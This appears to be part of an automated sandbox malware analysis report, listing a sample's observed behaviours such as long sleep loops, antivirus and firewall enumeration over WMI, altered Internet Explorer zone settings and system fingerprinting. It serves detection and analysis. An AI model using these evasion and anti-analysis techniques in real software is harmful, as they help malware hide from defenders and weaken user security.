Source: C:\Windows\SysWOW64\regsvr32.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_9-49475

Found evasive API chain (may stop execution after checking a module file name)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_3-15325

Found large amount of non-executed APIs

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe	API coverage: 4.7 %
Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 3.7 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe TID: 916	Thread sleep count: 512 > 30
Source: C:\Users\admin\AppData\Local\Temp\a2.exe TID: 916	Thread sleep time: -25600s >= -60s
Source: C:\Users\admin\AppData\Local\Temp\a2.exe TID: 2812	Thread sleep count: 110 > 30
Source: C:\Users\admin\AppData\Local\Temp\a2.exe TID: 2812	Thread sleep time: -110000s >= -60s
Source: C:\Users\admin\AppData\Local\Temp\a2.exe TID: 3068	Thread sleep time: -5000s >= -60s
Source: C:\Users\admin\AppData\Local\Temp\a2.exe TID: 2840	Thread sleep time: -500s >= -60s
Source: C:\Users\admin\AppData\Local\Temp\a2.exe TID: 2812	Thread sleep time: -3000s >= -60s
Source: C:\Users\admin\AppData\Local\Temp\a2.exe TID: 2776	Thread sleep time: -99999999s >= -60s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 752	Thread sleep count: 549 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 752	Thread sleep count: 43 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1844	Thread sleep time: -1000s >= -60s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2764	Thread sleep time: -99999999s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3268	Thread sleep count: 905 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3268	Thread sleep time: -45250s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3296	Thread sleep count: 317 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3296	Thread sleep time: -317000s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1780	Thread sleep time: -1500s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3284	Thread sleep count: 502 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3284	Thread sleep time: -50200s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3284	Thread sleep count: 111 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3284	Thread sleep time: -55500s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3288	Thread sleep time: -3000s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3272	Thread sleep count: 36 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3272	Thread sleep time: -180000s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3012	Thread sleep time: -60000s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1780	Thread sleep time: -15000s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1912	Thread sleep time: -5000s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3432	Thread sleep time: -120000s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2952	Thread sleep time: -99999999s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3316	Thread sleep count: 885 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3316	Thread sleep time: -44250s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3340	Thread sleep count: 111 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3340	Thread sleep time: -55500s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3332	Thread sleep count: 163 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3332	Thread sleep time: -163000s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3352	Thread sleep time: -5000s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3352	Thread sleep time: -1000s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 780	Thread sleep time: -99999999s >= -60s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2828	Thread sleep time: -99999999s >= -60s

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe

Last function: Thread delayed

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Process information set: NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: FAILCRITICALERRORS and NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: FAILCRITICALERRORS and NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOGPFAULTERRORBOX

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AED330 IsIconic,GetWindowPlacement,GetWindowRect,	5_2_00AED330
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_0088D330 IsIconic,GetWindowPlacement,GetWindowRect,	9_2_0088D330
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0100D330 IsIconic,GetWindowPlacement,GetWindowRect,	12_2_0100D330

Contains functionality to query the monitors power state (may be used to check if the desktop is visible)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe

Code function: 5_2_00B2BF58 CreateFileA,GetDevicePowerState,CloseHandle,

5_2_00B2BF58

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Show sources

Source: regsvr32.exe

Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Wireshark.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpywareProduct

Modifies Internet Explorer zone settings

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key created or modified: HKEY_USERS\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1206
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key created or modified: HKEY_USERS\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 2300
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key created or modified: HKEY_USERS\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1809
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key created or modified: HKEY_USERS\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1206
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key created or modified: HKEY_USERS\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 2300
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key created or modified: HKEY_USERS\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 1809

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_0258F7A8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_0258F7A8

Contains functionality to query the account / user name

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe

Code function: 5_2_00B2D72C GetUserNameW,

5_2_00B2D72C

Contains functionality to query time zone information

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe

Code function: 5_2_00B2D974 GetTimeZoneInformation,

5_2_00B2D974

Contains functionality to query windows version

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_02583E37 __EH_prolog,DsRoleGetPrimaryDomainInformation,DsRoleFreeMemory,GetVersionExA,GetSystemMetrics,

3_2_02583E37

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Contains functionality locales information (e.g. system language)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoA,	3_2_02587505
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: GetLocaleInfoA,	3_1_00412110
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	5_2_00AE59E8
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	5_2_00AE5ABB
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,	5_2_00B2D8FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetModuleFileNameA,6E15DCD0,6E15DCD0,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	9_2_008859E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,	9_2_008CD8FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	9_2_00885ABB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetModuleFileNameA,6E15DCD0,6E15DCD0,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	12_2_010059E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	12_2_01005ABB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,	12_2_0104D8FC

Queries the installation date of Windows

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Queries the installation date of Windows

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the product ID of Windows

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Tracing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.Tracing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat VolumeInformation

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Cryptography:

Spam, unwanted Advertisements and Ransom Demands:

Protection of GUI:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Networking:

Boot Survival:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Lowering of HIPS / PFW / Operating System Security Settings:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot